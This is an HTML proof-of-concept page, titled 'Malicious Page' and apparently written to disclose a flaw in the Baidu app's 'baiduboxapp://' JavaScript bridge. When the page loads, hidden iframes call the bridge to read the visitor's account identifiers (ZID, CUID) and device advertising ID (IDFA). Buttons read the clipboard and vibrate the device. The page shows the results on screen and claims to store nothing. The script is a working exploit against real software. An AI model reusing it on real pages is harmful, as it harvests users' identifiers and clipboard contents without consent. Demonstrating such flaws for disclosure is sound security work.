<!DOCTYPE html>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" charset="UTF-8">
    <style>
        body {
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }

        .container {
            width: 100%;
            padding: 15px;
        }

        @media screen and (min-width: 700px) {
            .container {
                width: 70%;
                margin: auto;
            }
        }

        p {
            white-space: pre-wrap; 
            word-wrap: break-word; 
            overflow-wrap: break-word; 
        }

        .bold-and-larger {
            font-weight: bold; 
            font-size: 1.5em; 
        }

        .larger {
            font-weight: bold; 
            font-size: 1.2em; 
        }

    </style>
    <title>Malicious Page</title>

</head>


<body>
    <h1>Malicious Page</h1>

    <p>!!! This is just a demo page, NO Sensitive Data will be stored!!!</p>

    <p><span class="bold-and-larger">An attacker can:</span></p>

    <p><span class="larger">Get Your Account Info:</span></p>
    <p style="font-size: 15px;" id="Cuid"></p>
    <p style="font-size: 15px;" id="Zid"></p>

    <p><span class="larger">Get Your Device Info:</span></p>
    <p style="font-size: 15px;" id="IDFA"></p>

    <p><span class="larger">Read Your ClipBoard:</span></p>    
    Will get your ClipBoard text:
    <p style="font-size: 15px;" id="ClipBoardText"></p>
    <input type="button" value="Access ClipBoard" id="AccessClipBoard" style="font-size: 20px; padding: 20px 25px;"/>

    <p><span class="larger">Vibrate Your Device Info:</span></p>
    <p style="font-size: 15px;" id="VibrateResult"></p>
    <input type="button" value="Vibrate" id="Vibrate" style="font-size: 20px; padding: 20px 25px;"/>

    <br><br><br>

    <script>
        
        function fetchData(url) {
            var iframe = document.createElement("iframe");
            iframe.style.cssText = "display:none;width:0px;height:0px;";
            iframe.src = url;
            document.body.appendChild(iframe);
        }

        function callback_getZid(jsonstr) {
            var json = JSON.parse(jsonstr);
            document.getElementById("Zid").innerText = "Your ZID: \n" + json.data.zid;
        }

        function callback_getCuid(jsonstr) {
            var json = JSON.parse(jsonstr);
            document.getElementById("Cuid").innerText = "Your CUID: \n" + json.unique_id;
        }

        function callback_getIdfa(jsonstr) {
            var json = JSON.parse(jsonstr);
            document.getElementById("IDFA").innerText = "Your IDFA: \n" + json.data.idfa;
        }

        function callback_vibrate(jsonstr) {
            var json = JSON.parse(jsonstr);
            const now = new Date();
            const timeStringSeconds = now.toLocaleDateString('en-US') + ' ' + now.toLocaleTimeString('en-US');
            document.getElementById("VibrateResult").innerText = "Vibrate Result: " + json.message + "\non: "+ timeStringSeconds;  
        }

        function callback_accessClipboard(jsonstr) {
            var json = JSON.parse(jsonstr);
            var ClipboardText = json.data.data;
            document.getElementById("ClipBoardText").innerText = ClipboardText;  
        }
        
        setTimeout(function() {

            fetchData('baiduboxapp://v14/account/getZid?callback=callback_getZid');

            fetchData('baiduboxapp://utils?action=getcuid&func=callback_getCuid');

            fetchData('baiduboxapp://v11/utils/getIdfa?callback=callback_getIdfa');

            document.getElementById("Vibrate").onclick = function () {
                fetchData('baiduboxapp://device/vibrate?callback=callback_vibrate');
            }

            document.getElementById("AccessClipBoard").onclick = function () {
                fetchData('baiduboxapp://utils/getClipboardData?callback=callback_accessClipboard');
            }

        }, 500);

    </script>

</body>

</html>